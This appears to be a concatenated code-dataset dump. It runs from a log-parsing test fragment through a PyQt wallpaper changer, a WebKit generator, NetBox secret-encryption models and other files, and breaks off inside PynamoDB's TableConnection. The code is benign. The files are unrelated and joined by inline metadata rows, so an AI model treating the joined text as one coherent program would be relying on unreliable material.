ut.EXPECT_EQ("Mozilla/4.08 [en] (Win98; I ;Nav)", "record.inputHdrField('User-agent')")
ut.EXPECT_EQ("127.0.0.1", "record.remoteHost")
ut.END_TEST()
ut.START_TEST("apache_log_custom")
record = getTestCustomApacheRecord()
ut.EXPECT_EQ("?query", "record.queryString")
ut.EXPECT_EQ("/path", "record.urlPath")
ut.EXPECT_EQ("http://www.host.com", "record.urlRoot")
ut.EXPECT_EQ("-", "record.referer")
ut.EXPECT_EQ(134e-6, "record.duration")
ut.EXPECT_EQ("Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0", "record.userAgent")
ut.EXPECT_EQ("text/html; charset=ISO-8859-4", "record.contentType")
ut.EXPECT_EQ(1000, "record.contentLength")
ut.END_TEST() | bsd-3-clause | -8,697,373,372,509,737,000 | 38.335312 | 229 | 0.608751 | false | 3.312094 | true | false | false |
globalpolicy/pyWall | main.py | 1 | 6745 | # Author : globalpolicy
# Date : March 2-4, 2017
# Script : pyWall
# Description : Change windows wallpaper
# Python : 3.5
# Blog : c0dew0rth.blogspot.com
import requests
from bs4 import BeautifulSoup
import random
import shutil # for copying raw image data(a file-like object) to an actual image file
import ctypes # for calling Win32 API, specifically, SystemParametersInfo, to set wallpaper
import base64 # for turning original imagename into filesystem safe name
import tempfile # for obtaining temp directory
import os # for deleting file
from PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QLabel, QTextEdit, QCheckBox, \
QSystemTrayIcon # for GUI
from PyQt5.QtGui import QFont, QIcon
import sys # for sys.exit(app.exec_())
import threading # for multithreading obviously
import time # for timing utilities
class QTGui(QWidget):
def __init__(self):
super().__init__()
self.showWindow()
def changeEvent(self, QEvent):
if QEvent.type() == QEvent.WindowStateChange:
if self.isMinimized():
print("minimized")
self.minimizetotray()
super().changeEvent(QEvent)
def showWindow(self):
self.setGeometry(300, 300, 300, 63)
self.setFixedSize(self.size())
self.setWindowIcon(QIcon("icon.png"))
self.setWindowTitle("pyWall UI")
global btn
btn = QPushButton("Change", self)
btn.resize(75, 23)
btn.move(0, self.height() - btn.height())
btn.setToolTip("Change the wallpaper right now.")
btn.clicked.connect(newWallpaperInNewThread)
global txtinterval
txtinterval = QTextEdit("100", self)
txtinterval.setToolTip("Time interval in seconds between wallpaper changes.")
txtinterval.resize(70, 23)
txtinterval.move(0, btn.y() - txtinterval.height())
global chkbox
chkbox = QCheckBox("Timer", self)
chkbox.setToolTip("Use timer for auto wallpaper change.")
chkbox.resize(49, 17)
chkbox.move(0, txtinterval.y() - chkbox.height())
chkbox.stateChanged.connect(checkBoxStateChanged)
global label
label = QLabel("", self)
label.setFont(QFont("Times", 8, QFont.Bold))
label.move(btn.width() + 5, 0)
label.resize(self.width()-btn.width(),self.height())
label.setWordWrap(True)
self.show()
def minimizetotray(self):
self.hide()
self.tray = QSystemTrayIcon()
self.tray.setIcon(QIcon("icon.png"))
self.tray.setToolTip("pyWall Tray")
self.tray.show()
self.tray.showMessage("pyWall", "pyWall will run in background.", msecs=500)
self.tray.activated.connect(self.trayiconactivated)
def trayiconactivated(self, reason):
if reason == QSystemTrayIcon.Trigger:
self.tray.hide()
self.show()
def checkBoxStateChanged(self):
timerStatus = chkbox.checkState() # chkbox.checkState() returns the "after-changed" status
try:
timerInterval = float(txtinterval.toPlainText())
except ValueError:
timerInterval = 300 # fail-safe value
if timerStatus: # True if checked
global killThreadEvent
killThreadEvent = threading.Event()
threading.Thread(target=newWallpaperLoop, args=(timerInterval, killThreadEvent), daemon=True).start()
else:
killThreadEvent.set() # setting this event will request the thread to stop
def main():
app = QApplication(sys.argv)
ui = QTGui() # instantiate our GUI class wherein the form actually displays
sys.exit(app.exec_()) # wait while GUI not closed
def newWallpaperInNewThread():
threading.Thread(target=newWallpaper, daemon=True).start()
def newWallpaper():
    global savepath  # keep the saved image path across calls so the previous download can be deleted next time
try:
os.remove(savepath) # delete the last downloaded image, the wallpaper will not be affected
print("Deleted ",savepath)
except Exception as ex:
print("Exception occurred while doing os.remove()\nException : ", ex)
try:
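        # Fetch the public page first to obtain the session cookie and CSRF token
        # that the JSON API request below sends along.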
firstURL = "https://500px.com/popular"
firstResponse = requests.get(firstURL)
cookie = firstResponse.cookies["_hpx1"]
content = firstResponse.content
soup = BeautifulSoup(content, "lxml")
found = soup.find("meta", attrs={"name": "csrf-token"})
csrfToken = found["content"]
randomPage = random.randint(1, 1000)
apiURL = "https://api.500px.com/v1/photos"
secondResponse = requests.get(apiURL, params={"rpp": 50, "feature": "popular", "image_size": 1080, "sort": "rating",
"exclude": "Nude", "formats": "jpeg", "page": randomPage},
headers={"Cookie": "_hpx1=" + cookie, "X-CSRF-Token": csrfToken})
# 500px API Reference:
# https://github.com/500px/api-documentation/blob/master/endpoints/photo/GET_photos.md
jsonResponse = secondResponse.json()
randomIndex = random.randint(0, 49)
randomImageLink = jsonResponse["photos"][randomIndex]["images"][0]["url"]
randomImageName = jsonResponse["photos"][randomIndex]["name"]
print(randomImageLink)
print(randomImageName)
label.setText(randomImageName)
randomImageName = base64.urlsafe_b64encode(randomImageName.encode("UTF-8")).decode(
"UTF-8") # base64 encoding turns any imagename into a filesystem friendly name
download = requests.get(randomImageLink, stream=True) # stream=True is required to access download.raw data
except Exception as ex:
print("Something went wrong while downloading, no internet?\nException : ",ex)
return
try:
savepath = tempfile.gettempdir() + "\\" + randomImageName + ".jpg"
with open(savepath, "wb") as file:
shutil.copyfileobj(download.raw, file)
SPI_SETDESKWALLPAPER = 20
ctypes.windll.user32.SystemParametersInfoW(SPI_SETDESKWALLPAPER, 0, savepath,
0) # ANSI version of the API doesn't seem to work here, thus the W
except Exception as ex:
print("Something went wrong while saving image.\nException : ", ex)
return
def newWallpaperLoop(timerinterval, stop_event):
while not stop_event.is_set():
newWallpaperInNewThread()
print("Spawning now!")
time.sleep(timerinterval)
print("stopped")
main()
| mit | -8,944,200,180,740,626,000 | 37.215116 | 124 | 0.630689 | false | 3.979351 | false | false | false |
teamfx/openjfx-8u-dev-rt | modules/web/src/main/native/Source/JavaScriptCore/inspector/scripts/codegen/generate_cpp_alternate_backend_dispatcher_header.py | 1 | 4331 | #!/usr/bin/env python
#
# Copyright (c) 2014, 2016 Apple Inc. All rights reserved.
# Copyright (c) 2014 University of Washington. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS''
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
import logging
import string
import re
from string import Template
from cpp_generator import CppGenerator
from cpp_generator_templates import CppGeneratorTemplates as CppTemplates
log = logging.getLogger('global')
class CppAlternateBackendDispatcherHeaderGenerator(CppGenerator):
def __init__(self, *args, **kwargs):
CppGenerator.__init__(self, *args, **kwargs)
def output_filename(self):
return '%sAlternateBackendDispatchers.h' % self.protocol_name()
def generate_output(self):
template_args = {
'includes': self._generate_secondary_header_includes()
}
domains = self.domains_to_generate()
sections = []
sections.append(self.generate_license())
sections.append(Template(CppTemplates.AlternateDispatchersHeaderPrelude).substitute(None, **template_args))
sections.append('\n'.join(filter(None, map(self._generate_handler_declarations_for_domain, domains))))
sections.append(Template(CppTemplates.AlternateDispatchersHeaderPostlude).substitute(None, **template_args))
return '\n\n'.join(sections)
# Private methods.
def _generate_secondary_header_includes(self):
target_framework_name = self.model().framework.name
header_includes = [
([target_framework_name], (target_framework_name, "%sProtocolTypes.h" % self.protocol_name())),
(["JavaScriptCore"], ("JavaScriptCore", "inspector/InspectorFrontendRouter.h")),
(["JavaScriptCore"], ("JavaScriptCore", "inspector/InspectorBackendDispatcher.h")),
]
return '\n'.join(self.generate_includes_from_entries(header_includes))
def _generate_handler_declarations_for_domain(self, domain):
commands = self.commands_for_domain(domain)
if not len(commands):
return ''
command_declarations = []
for command in commands:
command_declarations.append(self._generate_handler_declaration_for_command(command))
handler_args = {
'domainName': domain.domain_name,
'commandDeclarations': '\n'.join(command_declarations),
}
return self.wrap_with_guard_for_domain(domain, Template(CppTemplates.AlternateBackendDispatcherHeaderDomainHandlerInterfaceDeclaration).substitute(None, **handler_args))
def _generate_handler_declaration_for_command(self, command):
lines = []
parameters = ['long callId']
for _parameter in command.call_parameters:
parameters.append('%s in_%s' % (CppGenerator.cpp_type_for_unchecked_formal_in_parameter(_parameter), _parameter.parameter_name))
command_args = {
'commandName': command.command_name,
'parameters': ', '.join(parameters),
}
lines.append(' virtual void %(commandName)s(%(parameters)s) = 0;' % command_args)
return '\n'.join(lines)
| gpl-2.0 | -8,505,268,923,321,353,000 | 42.747475 | 177 | 0.704918 | false | 4.283877 | false | false | false |
digitalocean/netbox | netbox/secrets/models.py | 1 | 14739 | import os
from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
from Crypto.Util import strxor
from django.conf import settings
from django.contrib.auth.hashers import make_password, check_password
from django.contrib.auth.models import Group, User
from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import ValidationError
from django.db import models
from django.urls import reverse
from django.utils.encoding import force_bytes
from taggit.managers import TaggableManager
from extras.models import ChangeLoggedModel, CustomFieldModel, TaggedItem
from extras.utils import extras_features
from utilities.querysets import RestrictedQuerySet
from .exceptions import InvalidKey
from .hashers import SecretValidationHasher
from .querysets import UserKeyQuerySet
from .utils import encrypt_master_key, decrypt_master_key, generate_random_key
__all__ = (
'Secret',
'SecretRole',
'SessionKey',
'UserKey',
)
class UserKey(models.Model):
"""
A UserKey stores a user's personal RSA (public) encryption key, which is used to generate their unique encrypted
copy of the master encryption key. The encrypted instance of the master key can be decrypted only with the user's
matching (private) decryption key.
"""
created = models.DateField(
auto_now_add=True
)
last_updated = models.DateTimeField(
auto_now=True
)
user = models.OneToOneField(
to=User,
on_delete=models.CASCADE,
related_name='user_key',
editable=False
)
public_key = models.TextField(
verbose_name='RSA public key'
)
master_key_cipher = models.BinaryField(
max_length=512,
blank=True,
null=True,
editable=False
)
objects = UserKeyQuerySet.as_manager()
class Meta:
ordering = ['user__username']
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
# Store the initial public_key and master_key_cipher to check for changes on save().
self.__initial_public_key = self.public_key
self.__initial_master_key_cipher = self.master_key_cipher
def __str__(self):
return self.user.username
def clean(self):
super().clean()
if self.public_key:
# Validate the public key format
try:
pubkey = RSA.import_key(self.public_key)
except ValueError:
raise ValidationError({
'public_key': "Invalid RSA key format."
})
except Exception:
raise ValidationError("Something went wrong while trying to save your key. Please ensure that you're "
"uploading a valid RSA public key in PEM format (no SSH/PGP).")
# Validate the public key length
pubkey_length = pubkey.size_in_bits()
if pubkey_length < settings.SECRETS_MIN_PUBKEY_SIZE:
raise ValidationError({
'public_key': "Insufficient key length. Keys must be at least {} bits long.".format(
settings.SECRETS_MIN_PUBKEY_SIZE
)
})
# We can't use keys bigger than our master_key_cipher field can hold
if pubkey_length > 4096:
raise ValidationError({
'public_key': "Public key size ({}) is too large. Maximum key size is 4096 bits.".format(
pubkey_length
)
})
def save(self, *args, **kwargs):
# Check whether public_key has been modified. If so, nullify the initial master_key_cipher.
if self.__initial_master_key_cipher and self.public_key != self.__initial_public_key:
self.master_key_cipher = None
# If no other active UserKeys exist, generate a new master key and use it to activate this UserKey.
if self.is_filled() and not self.is_active() and not UserKey.objects.active().count():
master_key = generate_random_key()
self.master_key_cipher = encrypt_master_key(master_key, self.public_key)
super().save(*args, **kwargs)
def delete(self, *args, **kwargs):
# If Secrets exist and this is the last active UserKey, prevent its deletion. Deleting the last UserKey will
# result in the master key being destroyed and rendering all Secrets inaccessible.
if Secret.objects.count() and [uk.pk for uk in UserKey.objects.active()] == [self.pk]:
raise Exception("Cannot delete the last active UserKey when Secrets exist! This would render all secrets "
"inaccessible.")
super().delete(*args, **kwargs)
def is_filled(self):
"""
Returns True if the UserKey has been filled with a public RSA key.
"""
return bool(self.public_key)
is_filled.boolean = True
def is_active(self):
"""
Returns True if the UserKey has been populated with an encrypted copy of the master key.
"""
return self.master_key_cipher is not None
is_active.boolean = True
def get_master_key(self, private_key):
"""
        Given the User's private key, decrypt and return the master key.
"""
        if not self.is_active():
raise ValueError("Unable to retrieve master key: UserKey is inactive.")
try:
return decrypt_master_key(force_bytes(self.master_key_cipher), private_key)
except ValueError:
return None
def activate(self, master_key):
"""
Activate the UserKey by saving an encrypted copy of the master key to the database.
"""
if not self.public_key:
raise Exception("Cannot activate UserKey: Its public key must be filled first.")
self.master_key_cipher = encrypt_master_key(master_key, self.public_key)
self.save()
class SessionKey(models.Model):
"""
A SessionKey stores a User's temporary key to be used for the encryption and decryption of secrets.
"""
userkey = models.OneToOneField(
to='secrets.UserKey',
on_delete=models.CASCADE,
related_name='session_key',
editable=False
)
cipher = models.BinaryField(
max_length=512,
editable=False
)
hash = models.CharField(
max_length=128,
editable=False
)
created = models.DateTimeField(
auto_now_add=True
)
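    # Plaintext session key, generated in save(); only its hash and the XOR cipher are persisted.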
key = None
class Meta:
ordering = ['userkey__user__username']
def __str__(self):
return self.userkey.user.username
def save(self, master_key=None, *args, **kwargs):
if master_key is None:
raise Exception("The master key must be provided to save a session key.")
# Generate a random 256-bit session key if one is not already defined
if self.key is None:
self.key = generate_random_key()
# Generate SHA256 hash using Django's built-in password hashing mechanism
self.hash = make_password(self.key)
# Encrypt master key using the session key
self.cipher = strxor.strxor(self.key, master_key)
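        # strxor requires equal-length inputs; both keys are 256 bits (see generate_random_key).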
super().save(*args, **kwargs)
def get_master_key(self, session_key):
# Validate the provided session key
if not check_password(session_key, self.hash):
raise InvalidKey("Invalid session key")
# Decrypt master key using provided session key
master_key = strxor.strxor(session_key, bytes(self.cipher))
return master_key
def get_session_key(self, master_key):
# Recover session key using the master key
session_key = strxor.strxor(master_key, bytes(self.cipher))
# Validate the recovered session key
if not check_password(session_key, self.hash):
raise InvalidKey("Invalid master key")
return session_key
class SecretRole(ChangeLoggedModel):
"""
A SecretRole represents an arbitrary functional classification of Secrets. For example, a user might define roles
such as "Login Credentials" or "SNMP Communities."
"""
name = models.CharField(
max_length=100,
unique=True
)
slug = models.SlugField(
max_length=100,
unique=True
)
description = models.CharField(
max_length=200,
blank=True,
)
objects = RestrictedQuerySet.as_manager()
csv_headers = ['name', 'slug', 'description']
class Meta:
ordering = ['name']
def __str__(self):
return self.name
def get_absolute_url(self):
return "{}?role={}".format(reverse('secrets:secret_list'), self.slug)
def to_csv(self):
return (
self.name,
self.slug,
self.description,
)
@extras_features('custom_fields', 'custom_links', 'export_templates', 'webhooks')
class Secret(ChangeLoggedModel, CustomFieldModel):
"""
A Secret stores an AES256-encrypted copy of sensitive data, such as passwords or secret keys. An irreversible
SHA-256 hash is stored along with the ciphertext for validation upon decryption. Each Secret is assigned to exactly
one NetBox object, and objects may have multiple Secrets associated with them. A name can optionally be defined
along with the ciphertext; this string is stored as plain text in the database.
A Secret can be up to 65,535 bytes (64KB - 1B) in length. Each secret string will be padded with random data to
a minimum of 64 bytes during encryption in order to protect short strings from ciphertext analysis.
"""
assigned_object_type = models.ForeignKey(
to=ContentType,
on_delete=models.PROTECT
)
assigned_object_id = models.PositiveIntegerField()
assigned_object = GenericForeignKey(
ct_field='assigned_object_type',
fk_field='assigned_object_id'
)
role = models.ForeignKey(
to='secrets.SecretRole',
on_delete=models.PROTECT,
related_name='secrets'
)
name = models.CharField(
max_length=100,
blank=True
)
ciphertext = models.BinaryField(
max_length=65568, # 128-bit IV + 16-bit pad length + 65535B secret + 15B padding
editable=False
)
hash = models.CharField(
max_length=128,
editable=False
)
tags = TaggableManager(through=TaggedItem)
objects = RestrictedQuerySet.as_manager()
plaintext = None
csv_headers = ['assigned_object_type', 'assigned_object_id', 'role', 'name', 'plaintext']
class Meta:
ordering = ('role', 'name', 'pk')
unique_together = ('assigned_object_type', 'assigned_object_id', 'role', 'name')
def __init__(self, *args, **kwargs):
self.plaintext = kwargs.pop('plaintext', None)
super().__init__(*args, **kwargs)
def __str__(self):
return self.name or 'Secret'
def get_absolute_url(self):
return reverse('secrets:secret', args=[self.pk])
def to_csv(self):
return (
f'{self.assigned_object_type.app_label}.{self.assigned_object_type.model}',
self.assigned_object_id,
self.role,
self.name,
self.plaintext or '',
)
def _pad(self, s):
"""
Prepend the length of the plaintext (2B) and pad with garbage to a multiple of 16B (minimum of 64B).
+--+--------+-------------------------------------------+
|LL|MySecret|xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx|
+--+--------+-------------------------------------------+
"""
s = s.encode('utf8')
if len(s) > 65535:
raise ValueError("Maximum plaintext size is 65535 bytes.")
# Minimum ciphertext size is 64 bytes to conceal the length of short secrets.
if len(s) <= 62:
pad_length = 62 - len(s)
elif (len(s) + 2) % 16:
pad_length = 16 - ((len(s) + 2) % 16)
else:
pad_length = 0
header = bytes([len(s) >> 8]) + bytes([len(s) % 256])
return header + s + os.urandom(pad_length)
def _unpad(self, s):
"""
Consume the first two bytes of s as a plaintext length indicator and return only that many bytes as the
plaintext.
"""
if isinstance(s[0], str):
plaintext_length = (ord(s[0]) << 8) + ord(s[1])
else:
plaintext_length = (s[0] << 8) + s[1]
return s[2:plaintext_length + 2].decode('utf8')
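# Worked example of the padding scheme (hypothetical secret): for the 8-byte
# plaintext b"MySecret", len(s) <= 62 so pad_length = 62 - 8 = 54, giving a
# 2 + 8 + 54 = 64-byte payload with header bytes (0x00, 0x08); _unpad() reads
# that header and returns only the 8 bytes that follow it.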
def encrypt(self, secret_key):
"""
Generate a random initialization vector (IV) for AES. Pad the plaintext to the AES block size (16 bytes) and
encrypt. Prepend the IV for use in decryption. Finally, record the SHA256 hash of the plaintext for validation
upon decryption.
"""
if self.plaintext is None:
raise Exception("Must unlock or set plaintext before locking.")
# Pad and encrypt plaintext
iv = os.urandom(16)
aes = AES.new(secret_key, AES.MODE_CFB, iv)
self.ciphertext = iv + aes.encrypt(self._pad(self.plaintext))
# Generate SHA256 hash using Django's built-in password hashing mechanism
self.hash = make_password(self.plaintext, hasher=SecretValidationHasher())
self.plaintext = None
def decrypt(self, secret_key):
"""
Consume the first 16 bytes of self.ciphertext as the AES initialization vector (IV). The remainder is decrypted
using the IV and the provided secret key. Padding is then removed to reveal the plaintext. Finally, validate the
decrypted plaintext value against the stored hash.
"""
if self.plaintext is not None:
return
if not self.ciphertext:
raise Exception("Must define ciphertext before unlocking.")
# Decrypt ciphertext and remove padding
iv = bytes(self.ciphertext[0:16])
ciphertext = bytes(self.ciphertext[16:])
aes = AES.new(secret_key, AES.MODE_CFB, iv)
plaintext = self._unpad(aes.decrypt(ciphertext))
# Verify decrypted plaintext against hash
if not self.validate(plaintext):
raise ValueError("Invalid key or ciphertext!")
self.plaintext = plaintext
def validate(self, plaintext):
"""
Validate that a given plaintext matches the stored hash.
"""
if not self.hash:
raise Exception("Hash has not been generated for this secret.")
return check_password(plaintext, self.hash, preferred=SecretValidationHasher())
| apache-2.0 | -4,090,337,497,129,936,000 | 33.68 | 120 | 0.619581 | false | 4.29458 | false | false | false |
5nizza/party-elli | synthesis/model_k_searcher.py | 1 | 1140 | import logging
from helpers.logging_helper import log_entrance
from interfaces.LTS import LTS
from interfaces.solver_interface import SolverInterface
from synthesis.coreach_encoder import CoreachEncoder
from synthesis.smt_format import make_check_sat
@log_entrance()
def search(min_size:int, max_size:int,
max_k:int,
encoder:CoreachEncoder,
solver:SolverInterface) -> LTS or None:
solver += encoder.encode_headers()
solver += encoder.encode_initialization()
last_size = 0
for size in range(min_size, max_size+1):
k = min(max_k, size//3 + 1)
logging.info('searching a model: size=%i, k=%i'%(size,k))
solver += encoder.encode_run_graph(range(size)[last_size:])
solver.push() # >>>>>>>>> push
solver += encoder.encode_model_bound(range(size))
solver += make_check_sat(encoder.encode_assumption_forbid_k(max_k - k))
solver += encoder.encode_get_model_values()
ret = solver.solve()
if ret:
return encoder.parse_model(ret)
solver.pop() # <<<<<<<<<< pop
last_size = size
return None
| mit | 5,410,120,537,181,015,000 | 30.666667 | 79 | 0.635965 | false | 3.619048 | false | false | false |
qdonnellan/django_emailoto | emailoto/config.py | 1 | 1065 | from django.conf import settings
class EmailOtoConfig(object):
def __init__(self):
"""Read from settings.py and apply defaults (or raise exceptions.)"""
self.redis_host = settings.EMAILOTO.get('redis_host', 'localhost')
self.redis_port = settings.EMAILOTO.get('redis_port', 6379)
self.redis_db = settings.EMAILOTO.get('redis_db', 2)
self.expiration = settings.EMAILOTO.get('expiration', 60 * 10)
self.ratelimit = settings.EMAILOTO.get('ratelimit', '5/m')
class ImproperlyConfigured(Exception):
pass
@property
def mailgun_api_key(self):
return self.get_or_raise('mailgun_api_key')
@property
def mailgun_api_url(self):
return self.get_or_raise('mailgun_api_url')
def get_or_raise(self, setting_key):
value = settings.EMAILOTO.get(setting_key)
if not value:
raise self.ImproperlyConfigured(
'No "%s" found in settings.py configuration.' % (setting_key)
)
return value
CONFIG = EmailOtoConfig()
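# Illustrative settings.py snippet assumed by the class above; the values shown
# are placeholders. Only the two Mailgun keys go through get_or_raise(); the
# rest fall back to the defaults set in __init__().
# EMAILOTO = {
#     'redis_host': 'localhost',
#     'redis_port': 6379,
#     'redis_db': 2,
#     'expiration': 60 * 10,
#     'ratelimit': '5/m',
#     'mailgun_api_key': '<your-mailgun-api-key>',
#     'mailgun_api_url': 'https://api.mailgun.net/v3/<your-domain>/messages',
# }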
| mit | -8,496,874,060,864,339,000 | 29.428571 | 77 | 0.630986 | false | 3.75 | true | false | false |
ragupta-git/ImcSdk | imcsdk/mometa/equipment/EquipmentSystemIOController.py | 1 | 2755 | """This module contains the general information for EquipmentSystemIOController ManagedObject."""
from ...imcmo import ManagedObject
from ...imccoremeta import MoPropertyMeta, MoMeta
from ...imcmeta import VersionMeta
class EquipmentSystemIOControllerConsts:
ADMIN_POWER_CMC_REBOOT = "cmc-reboot"
ADMIN_POWER_CMC_RESET_DEFAULT = "cmc-reset-default"
ADMIN_POWER_POLICY = "policy"
class EquipmentSystemIOController(ManagedObject):
"""This is EquipmentSystemIOController class."""
consts = EquipmentSystemIOControllerConsts()
naming_props = set([u'id'])
mo_meta = {
"modular": MoMeta("EquipmentSystemIOController", "equipmentSystemIOController", "slot-[id]", VersionMeta.Version2013e, "InputOutput", 0x1f, [], ["admin", "read-only", "user"], [u'equipmentChassis'], [u'commEpIpmiLan', u'equipmentSharedIOModule', u'mgmtController', u'siocResetReason'], ["Get", "Set"])
}
prop_meta = {
"modular": {
"admin_power": MoPropertyMeta("admin_power", "adminPower", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x2, None, None, None, ["cmc-reboot", "cmc-reset-default", "policy"], []),
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version2013e, MoPropertyMeta.INTERNAL, None, None, None, None, [], []),
"description": MoPropertyMeta("description", "description", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x4, 0, 255, None, [], []),
"id": MoPropertyMeta("id", "id", "uint", VersionMeta.Version2013e, MoPropertyMeta.NAMING, None, None, None, None, [], ["1-2"]),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x8, 0, 255, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x10, None, None, None, ["", "created", "deleted", "modified", "removed"], []),
},
}
prop_map = {
"modular": {
"adminPower": "admin_power",
"childAction": "child_action",
"description": "description",
"dn": "dn",
"id": "id",
"rn": "rn",
"status": "status",
},
}
def __init__(self, parent_mo_or_dn, id, **kwargs):
self._dirty_mask = 0
self.id = id
self.admin_power = None
self.child_action = None
self.description = None
self.status = None
ManagedObject.__init__(self, "EquipmentSystemIOController", parent_mo_or_dn, **kwargs)
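# Illustrative usage sketch; the parent dn and id are hypothetical examples:
#   sioc = EquipmentSystemIOController(parent_mo_or_dn="sys/chassis-1", id="1")
#   sioc.admin_power = "cmc-reboot"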
| apache-2.0 | -862,146,203,412,341,400 | 43.435484 | 309 | 0.625408 | false | 3.532051 | false | false | false |
aerosara/thesis | notebooks_archive_10112014/pycse Examples.py | 1 | 2176 | # -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <headingcell level=3>
# Example from pycse 1
# <codecell>
# copied from http://kitchingroup.cheme.cmu.edu/blog/tag/events/
from pycse import odelay
import matplotlib.pyplot as plt
import numpy as np
def ode(Y,x):
y1, y2 = Y
dy1dx = y2
dy2dx = -y1
return [dy1dx, dy2dx]
def event1(Y, x):
y1, y2 = Y
value = y2 - (-1.0)
isterminal = True
direction = 0
return value, isterminal, direction
def event2(Y, x):
dy1dx, dy2dx = ode(Y,x)
value = dy1dx - 0.0
isterminal = False
direction = -1 # derivative is decreasing towards a maximum
return value, isterminal, direction
Y0 = [2.0, 1.0]
xspan = np.linspace(0, 5)
X, Y, XE, YE, IE = odelay(ode, Y0, xspan, events=[event1, event2])
plt.plot(X, Y)
for ie,xe,ye in zip(IE, XE, YE):
if ie == 1: #this is the second event
y1,y2 = ye
plt.plot(xe, y1, 'ro')
plt.legend(['$y_1$', '$y_2$'], loc='best')
#plt.savefig('images/odelay-mult-eq.png')
plt.show()
# <headingcell level=3>
# Example from pycse 2
# <codecell>
# copied from: http://kitchingroup.cheme.cmu.edu/pycse/pycse.html#sec-10-1-8
# 10.1.8 Stopping the integration of an ODE at some condition
from pycse import *
import numpy as np
k = 0.23
Ca0 = 2.3
def dCadt(Ca, t):
return -k * Ca**2
def stop(Ca, t):
isterminal = True
direction = 0
value = 1.0 - Ca
return value, isterminal, direction
tspan = np.linspace(0.0, 10.0)
t, CA, TE, YE, IE = odelay(dCadt, Ca0, tspan, events=[stop])
print 'At t = {0:1.2f} seconds the concentration of A is {1:1.2f} mol/L.'.format(t[-1], float(CA[-1]))
# <headingcell level=3>
# fsolve example
# <codecell>
from math import cos
def func(x):
return x + 2*cos(x) # finds where this is zero
def func2(x):
out = [x[0]*cos(x[1]) - 4]
out.append(x[1]*x[0] - x[1] - 5)
return out # finds where both elements of this array are zero
from scipy.optimize import fsolve
x0 = fsolve(func, 0.3) # initial guess
print x0
print func(x0)
#-1.02986652932
x02 = fsolve(func2, [1, 1]) # initial guesses
print x02
print func2(x02)
#[ 6.50409711 0.90841421]
| mit | 5,269,726,309,331,049,000 | 18.781818 | 102 | 0.628676 | false | 2.498278 | false | false | false |
mtsgrd/PynamoDB2 | pynamodb/connection/table.py | 1 | 7391 | """
PynamoDB Connection classes
~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
from .base import Connection
class TableConnection(object):
"""
A higher level abstraction over botocore
"""
def __init__(self, table_name, region=None, host=None):
self._hash_keyname = None
self._range_keyname = None
self.table_name = table_name
self.connection = Connection(region=region, host=host)
def delete_item(self, hash_key,
range_key=None,
expected=None,
return_values=None,
return_consumed_capacity=None,
return_item_collection_metrics=None):
"""
Performs the DeleteItem operation and returns the result
"""
return self.connection.delete_item(
self.table_name,
hash_key,
range_key=range_key,
expected=expected,
return_values=return_values,
return_consumed_capacity=return_consumed_capacity,
return_item_collection_metrics=return_item_collection_metrics)
def update_item(self,
hash_key,
range_key=None,
attribute_updates=None,
expected=None,
return_consumed_capacity=None,
return_item_collection_metrics=None,
return_values=None
):
"""
Performs the UpdateItem operation
"""
return self.connection.update_item(
self.table_name,
hash_key,
range_key=range_key,
attribute_updates=attribute_updates,
expected=expected,
return_consumed_capacity=return_consumed_capacity,
return_item_collection_metrics=return_item_collection_metrics,
return_values=return_values)
def put_item(self, hash_key,
range_key=None,
attributes=None,
expected=None,
return_values=None,
return_consumed_capacity=None,
return_item_collection_metrics=None):
"""
Performs the PutItem operation and returns the result
"""
return self.connection.put_item(
self.table_name,
hash_key,
range_key=range_key,
attributes=attributes,
expected=expected,
return_values=return_values,
return_consumed_capacity=return_consumed_capacity,
return_item_collection_metrics=return_item_collection_metrics)
def batch_write_item(self,
put_items=None,
delete_items=None,
return_consumed_capacity=None,
return_item_collection_metrics=None):
"""
Performs the batch_write_item operation
"""
return self.connection.batch_write_item(
self.table_name,
put_items=put_items,
delete_items=delete_items,
return_consumed_capacity=return_consumed_capacity,
return_item_collection_metrics=return_item_collection_metrics)
def batch_get_item(self, keys, consistent_read=None, return_consumed_capacity=None, attributes_to_get=None):
"""
Performs the batch get item operation
"""
return self.connection.batch_get_item(
self.table_name,
keys,
consistent_read=consistent_read,
return_consumed_capacity=return_consumed_capacity,
